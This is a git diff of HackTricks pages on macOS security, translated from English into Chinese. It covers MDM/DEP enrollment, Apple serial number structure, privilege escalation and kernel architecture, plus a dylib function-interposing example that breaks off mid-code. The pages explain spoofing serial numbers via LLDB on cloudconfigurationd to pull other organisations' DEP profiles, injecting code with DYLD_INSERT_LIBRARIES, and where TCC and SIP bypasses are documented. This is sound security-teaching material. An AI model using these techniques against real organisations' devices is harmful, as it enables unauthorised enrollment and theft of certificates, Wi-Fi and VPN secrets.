-- Configuration profiles have multiple payloads to install -- Framework has a plugin-based architecture for installing profiles -- Each payload type is associated with a plugin - - Can be XPC (in framework) or classic Cocoa (in ManagedClient.app) -- Example: - - Certificate Payloads use CertificateService.xpc +- 一旦检索到,**配置文件将存储在系统上** +- 此步骤自动开始(如果在 **设置助手** 中) +- 由 **`CPInstallActivationProfile`** 驱动 +- 通过 mdmclient 通过 XPC 实现 +- LaunchDaemon(以 root 身份)或 LaunchAgent(以用户身份),具体取决于上下文 +- 配置文件有多个有效负载需要安装 +- 框架具有基于插件的架构来安装配置文件 +- 每种有效负载类型与一个插件相关联 +- 可以是 XPC(在框架中)或经典 Cocoa(在 ManagedClient.app 中) +- 示例: +- 证书有效负载使用 CertificateService.xpc -Typically, **activation profile** provided by an MDM vendor will **include the following payloads**: +通常,MDM 供应商提供的 **激活配置文件** 将 **包括以下有效负载**: -- `com.apple.mdm`: to **enroll** the device in MDM -- `com.apple.security.scep`: to securely provide a **client certificate** to the device. -- `com.apple.security.pem`: to **install trusted CA certificates** to the device’s System Keychain. -- Installing the MDM payload equivalent to **MDM check-in in the documentation** -- Payload **contains key properties**: -- - MDM Check-In URL (**`CheckInURL`**) - - MDM Command Polling URL (**`ServerURL`**) + APNs topic to trigger it -- To install MDM payload, request is sent to **`CheckInURL`** -- Implemented in **`mdmclient`** -- MDM payload can depend on other payloads -- Allows **requests to be pinned to specific certificates**: - - Property: **`CheckInURLPinningCertificateUUIDs`** - - Property: **`ServerURLPinningCertificateUUIDs`** - - Delivered via PEM payload -- Allows device to be attributed with an identity certificate: - - Property: IdentityCertificateUUID - - Delivered via SCEP payload +- `com.apple.mdm`:用于 **注册** 设备到 MDM +- `com.apple.security.scep`:安全地向设备提供 **客户端证书**。 +- `com.apple.security.pem`:向设备的系统钥匙串 **安装受信任的 CA 证书**。 +- 安装 MDM 有效负载相当于文档中的 **MDM 签到** +- 有效负载 **包含关键属性**: +- - MDM 签到 URL(**`CheckInURL`**) +- MDM 命令轮询 URL(**`ServerURL`**) + 触发它的 APNs 主题 +- 要安装 MDM 有效负载,请向 **`CheckInURL`** 发送请求 +- 在 **`mdmclient`** 中实现 +- MDM 有效负载可以依赖于其他有效负载 +- 允许 **请求固定到特定证书**: +- 属性:**`CheckInURLPinningCertificateUUIDs`** +- 属性:**`ServerURLPinningCertificateUUIDs`** +- 通过 PEM 有效负载传递 +- 允许设备被赋予身份证书: +- 属性:IdentityCertificateUUID +- 通过 SCEP 有效负载传递 -### **Step 7: Listening for MDM commands** +### **第 7 步:监听 MDM 命令** -- After MDM check-in is complete, vendor can **issue push notifications using APNs** -- Upon receipt, handled by **`mdmclient`** -- To poll for MDM commands, request is sent to ServerURL -- Makes use of previously installed MDM payload: - - **`ServerURLPinningCertificateUUIDs`** for pinning request - - **`IdentityCertificateUUID`** for TLS client certificate +- 在 MDM 签到完成后,供应商可以 **使用 APNs 发布推送通知** +- 收到后,由 **`mdmclient`** 处理 +- 要轮询 MDM 命令,请向 ServerURL 发送请求 +- 利用先前安装的 MDM 有效负载: +- **`ServerURLPinningCertificateUUIDs`** 用于固定请求 +- **`IdentityCertificateUUID`** 用于 TLS 客户端证书 -## Attacks +## 攻击 -### Enrolling Devices in Other Organisations +### 在其他组织中注册设备 -As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: +如前所述,为了尝试将设备注册到一个组织 **只需要该组织的序列号**。一旦设备注册,多个组织将会在新设备上安装敏感数据:证书、应用程序、WiFi 密码、VPN 配置 [等等](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf)。\ +因此,如果注册过程没有得到正确保护,这可能成为攻击者的一个危险入口点: {{#ref}} enrolling-devices-in-other-organisations.md diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md index 19851b925..47cefde4b 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md @@ -1,53 +1,53 @@ -# Enrolling Devices in Other Organisations +# 在其他组织中注册设备 {{#include ../../../banners/hacktricks-training.md}} -## Intro +## 介绍 -As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. +正如[**之前提到的**](./#what-is-mdm-mobile-device-management)**,**为了尝试将设备注册到一个组织中**只需要该组织的序列号**。一旦设备注册,多个组织将会在新设备上安装敏感数据:证书、应用程序、WiFi 密码、VPN 配置[等等](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf)。\ +因此,如果注册过程没有得到正确保护,这可能成为攻击者的危险入口。 -**The following is a summary of the research [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Check it for further technical details!** +**以下是研究的摘要[https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)。请查看以获取更多技术细节!** -## Overview of DEP and MDM Binary Analysis +## DEP 和 MDM 二进制分析概述 -This research delves into the binaries associated with the Device Enrollment Program (DEP) and Mobile Device Management (MDM) on macOS. Key components include: +本研究深入探讨了与 macOS 上的设备注册程序(DEP)和移动设备管理(MDM)相关的二进制文件。关键组件包括: -- **`mdmclient`**: Communicates with MDM servers and triggers DEP check-ins on macOS versions before 10.13.4. -- **`profiles`**: Manages Configuration Profiles, and triggers DEP check-ins on macOS versions 10.13.4 and later. -- **`cloudconfigurationd`**: Manages DEP API communications and retrieves Device Enrollment profiles. +- **`mdmclient`**:与 MDM 服务器通信,并在 macOS 10.13.4 之前的版本上触发 DEP 检查。 +- **`profiles`**:管理配置文件,并在 macOS 10.13.4 及更高版本上触发 DEP 检查。 +- **`cloudconfigurationd`**:管理 DEP API 通信并检索设备注册配置文件。 -DEP check-ins utilize the `CPFetchActivationRecord` and `CPGetActivationRecord` functions from the private Configuration Profiles framework to fetch the Activation Record, with `CPFetchActivationRecord` coordinating with `cloudconfigurationd` through XPC. +DEP 检查利用私有配置文件框架中的 `CPFetchActivationRecord` 和 `CPGetActivationRecord` 函数来获取激活记录,`CPFetchActivationRecord` 通过 XPC 与 `cloudconfigurationd` 协调。 -## Tesla Protocol and Absinthe Scheme Reverse Engineering +## 特斯拉协议和 Absinthe 方案逆向工程 -The DEP check-in involves `cloudconfigurationd` sending an encrypted, signed JSON payload to _iprofiles.apple.com/macProfile_. The payload includes the device's serial number and the action "RequestProfileConfiguration". The encryption scheme used is referred to internally as "Absinthe". Unraveling this scheme is complex and involves numerous steps, which led to exploring alternative methods for inserting arbitrary serial numbers in the Activation Record request. +DEP 检查涉及 `cloudconfigurationd` 向 _iprofiles.apple.com/macProfile_ 发送加密的签名 JSON 负载。负载包括设备的序列号和操作 "RequestProfileConfiguration"。所使用的加密方案在内部称为 "Absinthe"。解开这个方案是复杂的,涉及多个步骤,这导致探索替代方法以在激活记录请求中插入任意序列号。 -## Proxying DEP Requests +## 代理 DEP 请求 -Attempts to intercept and modify DEP requests to _iprofiles.apple.com_ using tools like Charles Proxy were hindered by payload encryption and SSL/TLS security measures. However, enabling the `MCCloudConfigAcceptAnyHTTPSCertificate` configuration allows bypassing the server certificate validation, although the payload's encrypted nature still prevents modification of the serial number without the decryption key. +使用 Charles Proxy 等工具拦截和修改对 _iprofiles.apple.com_ 的 DEP 请求的尝试受到负载加密和 SSL/TLS 安全措施的阻碍。然而,启用 `MCCloudConfigAcceptAnyHTTPSCertificate` 配置可以绕过服务器证书验证,尽管负载的加密性质仍然阻止在没有解密密钥的情况下修改序列号。 -## Instrumenting System Binaries Interacting with DEP +## 对与 DEP 交互的系统二进制文件进行插桩 -Instrumenting system binaries like `cloudconfigurationd` requires disabling System Integrity Protection (SIP) on macOS. With SIP disabled, tools like LLDB can be used to attach to system processes and potentially modify the serial number used in DEP API interactions. This method is preferable as it avoids the complexities of entitlements and code signing. +对系统二进制文件如 `cloudconfigurationd` 进行插桩需要在 macOS 上禁用系统完整性保护(SIP)。禁用 SIP 后,可以使用 LLDB 等工具附加到系统进程,并可能修改在 DEP API 交互中使用的序列号。这种方法更可取,因为它避免了权限和代码签名的复杂性。 -**Exploiting Binary Instrumentation:** -Modifying the DEP request payload before JSON serialization in `cloudconfigurationd` proved effective. The process involved: +**利用二进制插桩:** +在 `cloudconfigurationd` 中 JSON 序列化之前修改 DEP 请求负载被证明是有效的。该过程涉及: -1. Attaching LLDB to `cloudconfigurationd`. -2. Locating the point where the system serial number is fetched. -3. Injecting an arbitrary serial number into the memory before the payload is encrypted and sent. +1. 将 LLDB 附加到 `cloudconfigurationd`。 +2. 找到获取系统序列号的点。 +3. 在负载被加密并发送之前,将任意序列号注入内存中。 -This method allowed for retrieving complete DEP profiles for arbitrary serial numbers, demonstrating a potential vulnerability. +这种方法允许检索任意序列号的完整 DEP 配置文件,展示了潜在的漏洞。 -### Automating Instrumentation with Python +### 使用 Python 自动化插桩 -The exploitation process was automated using Python with the LLDB API, making it feasible to programmatically inject arbitrary serial numbers and retrieve corresponding DEP profiles. +利用 Python 和 LLDB API 自动化了利用过程,使得可以以编程方式注入任意序列号并检索相应的 DEP 配置文件。 -### Potential Impacts of DEP and MDM Vulnerabilities +### DEP 和 MDM 漏洞的潜在影响 -The research highlighted significant security concerns: +研究突出了重大的安全隐患: -1. **Information Disclosure**: By providing a DEP-registered serial number, sensitive organizational information contained in the DEP profile can be retrieved. +1. **信息泄露**:通过提供一个 DEP 注册的序列号,可以检索 DEP 配置文件中包含的敏感组织信息。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md index 4b373d774..20310aa49 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md @@ -1,40 +1,40 @@ -# macOS Serial Number +# macOS 序列号 {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Apple devices post-2010 have serial numbers consisting of **12 alphanumeric characters**, each segment conveying specific information: +2010年后发布的Apple设备的序列号由**12个字母数字字符**组成,每个部分传达特定信息: -- **First 3 Characters**: Indicate the **manufacturing location**. -- **Characters 4 & 5**: Denote the **year and week of manufacture**. -- **Characters 6 to 8**: Serve as a **unique identifier** for each device. -- **Last 4 Characters**: Specify the **model number**. +- **前三个字符**:指示**制造地点**。 +- **第4和第5个字符**:表示**制造年份和周数**。 +- **第6到第8个字符**:作为每个设备的**唯一标识符**。 +- **最后4个字符**:指定**型号**。 -For instance, the serial number **C02L13ECF8J2** follows this structure. +例如,序列号**C02L13ECF8J2**遵循此结构。 -### **Manufacturing Locations (First 3 Characters)** +### **制造地点(前三个字符)** -Certain codes represent specific factories: +某些代码代表特定工厂: -- **FC, F, XA/XB/QP/G8**: Various locations in the USA. -- **RN**: Mexico. -- **CK**: Cork, Ireland. -- **VM**: Foxconn, Czech Republic. -- **SG/E**: Singapore. -- **MB**: Malaysia. -- **PT/CY**: Korea. -- **EE/QT/UV**: Taiwan. -- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**: Different locations in China. -- **C0, C3, C7**: Specific cities in China. -- **RM**: Refurbished devices. +- **FC, F, XA/XB/QP/G8**:美国的多个地点。 +- **RN**:墨西哥。 +- **CK**:爱尔兰科克。 +- **VM**:捷克共和国富士康。 +- **SG/E**:新加坡。 +- **MB**:马来西亚。 +- **PT/CY**:韩国。 +- **EE/QT/UV**:台湾。 +- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**:中国的不同地点。 +- **C0, C3, C7**:中国的特定城市。 +- **RM**:翻新设备。 -### **Year of Manufacturing (4th Character)** +### **制造年份(第4个字符)** -This character varies from 'C' (representing the first half of 2010) to 'Z' (second half of 2019), with different letters indicating different half-year periods. +该字符从'C'(代表2010年上半年)到'Z'(2019年下半年)变化,不同字母表示不同的半年时期。 -### **Week of Manufacturing (5th Character)** +### **制造周数(第5个字符)** -Digits 1-9 correspond to weeks 1-9. Letters C-Y (excluding vowels and 'S') represent weeks 10-27. For the second half of the year, 26 is added to this number. +数字1-9对应于第1-9周。字母C-Y(不包括元音和'S')代表第10-27周。对于下半年,该数字加上26。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md index 7fa9d3ae9..b2f002cb2 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -1,33 +1,18 @@ -# macOS Security & Privilege Escalation +# macOS 安全与权限提升 {{#include ../../banners/hacktricks-training.md}} -
+## 基础 MacOS -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +如果您对 macOS 不熟悉,您应该开始学习 macOS 的基础知识: -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - -## Basic MacOS - -If you are not familiar with macOS, you should start learning the basics of macOS: - -- Special macOS **files & permissions:** +- 特殊的 macOS **文件和权限:** {{#ref}} macos-files-folders-and-binaries/ {{#endref}} -- Common macOS **users** +- 常见的 macOS **用户** {{#ref}} macos-users.md @@ -39,112 +24,97 @@ macos-users.md macos-applefs.md {{#endref}} -- The **architecture** of the k**ernel** +- **内核**的 **架构** {{#ref}} mac-os-architecture/ {{#endref}} -- Common macOS n**etwork services & protocols** +- 常见的 macOS n**etwork 服务和协议** {{#ref}} macos-protocols.md {{#endref}} -- **Opensource** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) - - To download a `tar.gz` change a URL such as [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) to [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) +- **开源** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) +- 要下载 `tar.gz`,将 URL 更改为 [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) 到 [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) ### MacOS MDM -In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**: +在公司中,**macOS** 系统很可能会被 **MDM 管理**。因此,从攻击者的角度来看,了解 **其工作原理** 是很有趣的: {{#ref}} ../macos-red-teaming/macos-mdm/ {{#endref}} -### MacOS - Inspecting, Debugging and Fuzzing +### MacOS - 检查、调试和模糊测试 {{#ref}} macos-apps-inspecting-debugging-and-fuzzing/ {{#endref}} -## MacOS Security Protections +## MacOS 安全保护 {{#ref}} macos-security-protections/ {{#endref}} -## Attack Surface +## 攻击面 -### File Permissions +### 文件权限 -If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\ -This could occur in the following situations: +如果 **以 root 身份运行的进程写入** 一个可以被用户控制的文件,用户可能会利用此文件来 **提升权限**。\ +这可能发生在以下情况下: -- File used was already created by a user (owned by the user) -- File used is writable by the user because of a group -- File used is inside a directory owned by the user (the user could create the file) -- File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file) +- 使用的文件已经由用户创建(由用户拥有) +- 使用的文件因组而可被用户写入 +- 使用的文件位于用户拥有的目录中(用户可以创建该文件) +- 使用的文件位于 root 拥有的目录中,但用户因组而具有写入权限(用户可以创建该文件) -Being able to **create a file** that is going to be **used by root**, allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it to another place. +能够 **创建一个将被 root 使用的文件**,允许用户 **利用其内容**,甚至创建 **符号链接/硬链接** 指向另一个位置。 -For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**: +对于这种漏洞,不要忘记 **检查易受攻击的 `.pkg` 安装程序**: {{#ref}} macos-files-folders-and-binaries/macos-installers-abuse.md {{#endref}} -### File Extension & URL scheme app handlers +### 文件扩展名和 URL 方案应用程序处理程序 -Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols +通过文件扩展名注册的奇怪应用程序可能会被滥用,不同的应用程序可以注册以打开特定协议 {{#ref}} macos-file-extension-apps.md {{#endref}} -## macOS TCC / SIP Privilege Escalation +## macOS TCC / SIP 权限提升 -In macOS **applications and binaries can have permissions** to access folders or settings that make them more privileged than others. +在 macOS 中,**应用程序和二进制文件可以拥有** 访问文件夹或设置的权限,使其比其他应用程序更具特权。 -Therefore, an attacker that wants to successfully compromise a macOS machine will need to **escalate its TCC privileges** (or even **bypass SIP**, depending on his needs). +因此,想要成功攻陷 macOS 机器的攻击者需要 **提升其 TCC 权限**(甚至 **绕过 SIP**,具体取决于其需求)。 -These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**. +这些权限通常以 **应用程序签名的授权** 形式授予,或者应用程序可能请求某些访问权限,在 **用户批准后**,它们可以在 **TCC 数据库** 中找到。进程获取这些权限的另一种方式是成为具有这些 **权限** 的进程的 **子进程**,因为它们通常是 **继承的**。 -Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses). +请访问这些链接以找到不同的方式 [**在 TCC 中提升权限**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses),以 [**绕过 TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) 和过去 [**如何绕过 SIP**](macos-security-protections/macos-sip.md#sip-bypasses)。 -## macOS Traditional Privilege Escalation +## macOS 传统权限提升 -Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints: +当然,从红队的角度来看,您也应该对提升到 root 感兴趣。查看以下帖子以获取一些提示: {{#ref}} macos-privilege-escalation.md {{#endref}} -## macOS Compliance +## macOS 合规性 - [https://github.com/usnistgov/macos_security](https://github.com/usnistgov/macos_security) -## References +## 参考文献 -- [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) +- [**OS X 事件响应:脚本和分析**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) - [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) - [**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet) - [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) - [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index 306efd482..530c86ac8 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -1,69 +1,69 @@ -# macOS Kernel & System Extensions +# macOS 内核与系统扩展 {{#include ../../../banners/hacktricks-training.md}} -## XNU Kernel +## XNU 内核 -The **core of macOS is XNU**, which stands for "X is Not Unix". This kernel is fundamentally composed of the **Mach microkerne**l (to be discussed later), **and** elements from Berkeley Software Distribution (**BSD**). XNU also provides a platform for **kernel drivers via a system called the I/O Kit**. The XNU kernel is part of the Darwin open source project, which means **its source code is freely accessible**. +**macOS 的核心是 XNU**,代表“X is Not Unix”。这个内核基本上由 **Mach 微内核**(稍后讨论)和来自伯克利软件分发(**BSD**)的元素组成。XNU 还通过一个名为 I/O Kit 的系统提供 **内核驱动程序的平台**。XNU 内核是 Darwin 开源项目的一部分,这意味着 **其源代码是公开可获取的**。 -From a perspective of a security researcher or a Unix developer, **macOS** can feel quite **similar** to a **FreeBSD** system with an elegant GUI and a host of custom applications. Most applications developed for BSD will compile and run on macOS without needing modifications, as the command-line tools familiar to Unix users are all present in macOS. However, because the XNU kernel incorporates Mach, there are some significant differences between a traditional Unix-like system and macOS, and these differences might cause potential issues or provide unique advantages. +从安全研究人员或 Unix 开发者的角度来看,**macOS** 感觉与 **FreeBSD** 系统非常 **相似**,具有优雅的 GUI 和一系列自定义应用程序。大多数为 BSD 开发的应用程序可以在 macOS 上编译和运行,而无需修改,因为 Unix 用户熟悉的命令行工具在 macOS 中都存在。然而,由于 XNU 内核包含 Mach,因此传统 Unix 类系统与 macOS 之间存在一些显著差异,这些差异可能导致潜在问题或提供独特优势。 -Open source version of XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) +XNU 的开源版本:[https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) ### Mach -Mach is a **microkernel** designed to be **UNIX-compatible**. One of its key design principles was to **minimize** the amount of **code** running in the **kernel** space and instead allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level tasks**. +Mach 是一个 **微内核**,旨在 **与 UNIX 兼容**。其一个关键设计原则是 **最小化** 在 **内核** 空间中运行的 **代码** 数量,而允许许多典型的内核功能,如文件系统、网络和 I/O,**作为用户级任务运行**。 -In XNU, Mach is **responsible for many of the critical low-level operations** a kernel typically handles, such as processor scheduling, multitasking, and virtual memory management. +在 XNU 中,Mach 负责内核通常处理的许多关键低级操作,如处理器调度、多任务处理和虚拟内存管理。 ### BSD -The XNU **kernel** also **incorporates** a significant amount of code derived from the **FreeBSD** project. This code **runs as part of the kernel along with Mach**, in the same address space. However, the FreeBSD code within XNU may differ substantially from the original FreeBSD code because modifications were required to ensure its compatibility with Mach. FreeBSD contributes to many kernel operations including: +XNU **内核** 还 **包含** 大量来自 **FreeBSD** 项目的代码。这些代码 **与 Mach 一起作为内核的一部分运行**,在同一地址空间中。然而,XNU 中的 FreeBSD 代码可能与原始 FreeBSD 代码有显著不同,因为需要进行修改以确保其与 Mach 的兼容性。FreeBSD 为许多内核操作做出贡献,包括: -- Process management -- Signal handling -- Basic security mechanisms, including user and group management -- System call infrastructure -- TCP/IP stack and sockets -- Firewall and packet filtering +- 进程管理 +- 信号处理 +- 基本安全机制,包括用户和组管理 +- 系统调用基础设施 +- TCP/IP 堆栈和套接字 +- 防火墙和数据包过滤 -Understanding the interaction between BSD and Mach can be complex, due to their different conceptual frameworks. For instance, BSD uses processes as its fundamental executing unit, while Mach operates based on threads. This discrepancy is reconciled in XNU by **associating each BSD process with a Mach task** that contains exactly one Mach thread. When BSD's fork() system call is used, the BSD code within the kernel uses Mach functions to create a task and a thread structure. +由于 BSD 和 Mach 之间的不同概念框架,理解它们之间的交互可能很复杂。例如,BSD 使用进程作为其基本执行单元,而 Mach 基于线程操作。这种差异在 XNU 中通过 **将每个 BSD 进程与一个包含恰好一个 Mach 线程的 Mach 任务关联** 来调和。当使用 BSD 的 fork() 系统调用时,内核中的 BSD 代码使用 Mach 函数来创建任务和线程结构。 -Moreover, **Mach and BSD each maintain different security models**: **Mach's** security model is based on **port rights**, whereas BSD's security model operates based on **process ownership**. Disparities between these two models have occasionally resulted in local privilege-escalation vulnerabilities. Apart from typical system calls, there are also **Mach traps that allow user-space programs to interact with the kernel**. These different elements together form the multifaceted, hybrid architecture of the macOS kernel. +此外,**Mach 和 BSD 各自维护不同的安全模型**:**Mach 的** 安全模型基于 **端口权限**,而 BSD 的安全模型基于 **进程所有权**。这两种模型之间的差异偶尔会导致本地特权提升漏洞。除了典型的系统调用外,还有 **Mach 陷阱,允许用户空间程序与内核交互**。这些不同的元素共同构成了 macOS 内核的多面性混合架构。 -### I/O Kit - Drivers +### I/O Kit - 驱动程序 -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +I/O Kit 是 XNU 内核中的一个开源、面向对象的 **设备驱动程序框架**,处理 **动态加载的设备驱动程序**。它允许在内核中动态添加模块化代码,支持多种硬件。 {{#ref}} macos-iokit.md {{#endref}} -### IPC - Inter Process Communication +### IPC - 进程间通信 {{#ref}} ../macos-proces-abuse/macos-ipc-inter-process-communication/ {{#endref}} -## macOS Kernel Extensions +## macOS 内核扩展 -macOS is **super restrictive to load Kernel Extensions** (.kext) because of the high privileges that code will run with. Actually, by default is virtually impossible (unless a bypass is found). +由于代码将以高权限运行,macOS 对加载内核扩展(.kext)**非常严格**。实际上,默认情况下几乎不可能(除非找到绕过方法)。 -In the following page you can also see how to recover the `.kext` that macOS loads inside its **kernelcache**: +在以下页面中,您还可以看到如何恢复 macOS 在其 **kernelcache** 中加载的 `.kext`: {{#ref}} macos-kernel-extensions.md {{#endref}} -### macOS System Extensions +### macOS 系统扩展 -Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions. +macOS 创建了系统扩展,而不是使用内核扩展,提供用户级 API 与内核交互。这样,开发人员可以避免使用内核扩展。 {{#ref}} macos-system-extensions.md {{#endref}} -## References +## 参考文献 - [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=) - [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md index 424ed20b7..115dfa6d7 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md @@ -4,52 +4,47 @@ ## Function Interposing -Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions. +创建一个带有 **`__interpose`** 部分(或标记为 **`S_INTERPOSING`** 的部分)的 **dylib**,其中包含指向 **原始** 和 **替代** 函数的 **函数指针** 元组。 -Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/#check-restrictions). +然后,使用 **`DYLD_INSERT_LIBRARIES`** 注入 dylib(插入需要在主应用加载之前发生)。显然,适用于 **`DYLD_INSERT_LIBRARIES`** 使用的 [**限制** 在这里也适用](../macos-proces-abuse/macos-library-injection/#check-restrictions)。 ### Interpose printf {{#tabs}} {{#tab name="interpose.c"}} - ```c:interpose.c // gcc -dynamiclib interpose.c -o interpose.dylib #include #include int my_printf(const char *format, ...) { - //va_list args; - //va_start(args, format); - //int ret = vprintf(format, args); - //va_end(args); +//va_list args; +//va_start(args, format); +//int ret = vprintf(format, args); +//va_end(args); - int ret = printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf __attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf }; ``` - {{#endtab}} {{#tab name="hello.c"}} - ```c //gcc hello.c -o hello #include int main() { - printf("Hello World!\n"); - return 0; +printf("Hello World!\n"); +return 0; } ``` - {{#endtab}} {{#tab name="interpose2.c"}} - ```c // Just another way to define an interpose // gcc -dynamiclib interpose2.c -o interpose2.dylib @@ -57,26 +52,24 @@ int main() { #include #define DYLD_INTERPOSE(_replacement, _replacee) \ - __attribute__((used)) static struct { \ - const void* replacement; \ - const void* replacee; \ - } _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ - (const void*) (unsigned long) &_replacement, \ - (const void*) (unsigned long) &_replacee \ - }; +__attribute__((used)) static struct { \ +const void* replacement; \ +const void* replacee; \ +} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \ +(const void*) (unsigned long) &_replacement, \ +(const void*) (unsigned long) &_replacee \ +}; int my_printf(const char *format, ...) { - int ret 